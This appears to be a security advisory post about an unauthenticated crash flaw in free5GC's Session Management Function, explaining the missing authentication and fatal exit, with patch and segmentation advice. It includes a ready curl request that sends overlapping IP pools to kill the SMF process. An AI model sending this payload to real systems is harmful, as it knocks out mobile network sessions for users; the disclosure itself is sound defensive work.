Listen to this Post
This CVE affects free5GC’s Session Management Function (SMF), specifically the User Plane Information (UPI) management route group. The root cause is that the `/upi/v1/upNodesLinks` endpoint is mounted on the Service Based Interface (SBI) without any inbound OAuth2 authentication middleware (CWE-306 and CWE-862). This oversight allows any unauthenticated attacker with network access to the SMF to send arbitrary POST requests to the endpoint.
The vulnerability is triggered when the `POST /upi/v1/upNodesLinks` create-or-update handler processes an attacker-controlled JSON payload. The handler passes this data directly to the `UpNodesFromConfiguration()` function without any validation or sanitization. Inside this function, a critical flaw exists in the IP pool overlap check mechanism.
When `UpNodesFromConfiguration()` calls `isOverlap(allUEIPPools)` to validate that the new User Plane Function’s (UPF) IP pool does not conflict with existing configurations, a policy violation immediately triggers a fatal termination. The function calls logger.InitLog.Fatalf("overlap cidr value between UPFs"), which in the Go language context is equivalent to os.Exit(1).
This call bypasses all of Gin’s built-in error recovery mechanisms. Unlike a standard panic, which might be recovered at the goroutine level, `os.Exit` terminates the entire SMF process instantly.
Exploit: A single unauthenticated HTTP request is enough.
Effect: The Docker container running the SMF hard-exits with code `Exited (1)` immediately, resulting in complete loss of PDU-session establishment and a Denial of Service (DoS) across the management plane.
DailyCVE Form
Platform: free5GC
Version: v4.2.1
Vulnerability : Unauthenticated Process-Kill
Severity: Medium
date: 2026-05-08
Prediction: Patch already available (SMF 203)
What Undercode Say:
The vulnerability chain results from the UPI route group being mounted without authentication, combined with the use of `logger.InitLog.Fatalf()` for request validation. The `os.Exit(1)` call kills the process, preventing Gin’s middleware from handling the error gracefully.
Docker Compose lab validation
docker ps --filter name=smf
Inspect logs for fatal termination
docker logs --tail 50 smf | grep -i fatal
Simulate an attack with overlapping pools
curl -i -X POST http://10.100.200.6:8000/upi/v1/upNodesLinks \
-H 'Content-Type: application/json' \
--data '{"links":[{"A":"gNB1","B":"UPF-OVERLAP"}],"upNodes":{"UPF-OVERLAP":{"type":"UPF","nodeID":"198.51.100.20","addr":"198.51.100.20","sNssaiUpfInfos":[{"sNssai":{"sst":1,"sd":"010203"},"dnnUpfInfoList":[{"dnn":"internet","pools":[{"cidr":"10.60.0.0/16"}]}]}]}}}'
Exploit:
A remote attacker can repeatedly send crafted HTTP POST JSON payloads to the `UPI` endpoint containing overlapping `cidr` values (e.g., 10.60.0.0/16) to force the SMF process to crash instantly regardless of state.
Protection from this CVE
- Upgrade: Apply upstream patch free5gc/smf203, which refactors `UpNodesFromConfiguration` to return HTTP 400 errors instead of calling `Fatalf` and adds proper OAuth2 middleware to the UPI route group.
- Network Segmentation: Block inbound traffic to the SBI (TCP/8000) from untrusted network segments to prevent attackers from reaching the vulnerable endpoint.
- Runtime Monitoring: Implement monitoring alerts for `Exited (1)` container statuses for `free5gc/smf` images.
Impact:
- Availability: High. Single unauthenticated request permanently crashes the SMF service.
- Integrity: None. Crashes do not alter stored data.
- Confidentiality: None. No data extraction occurs.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
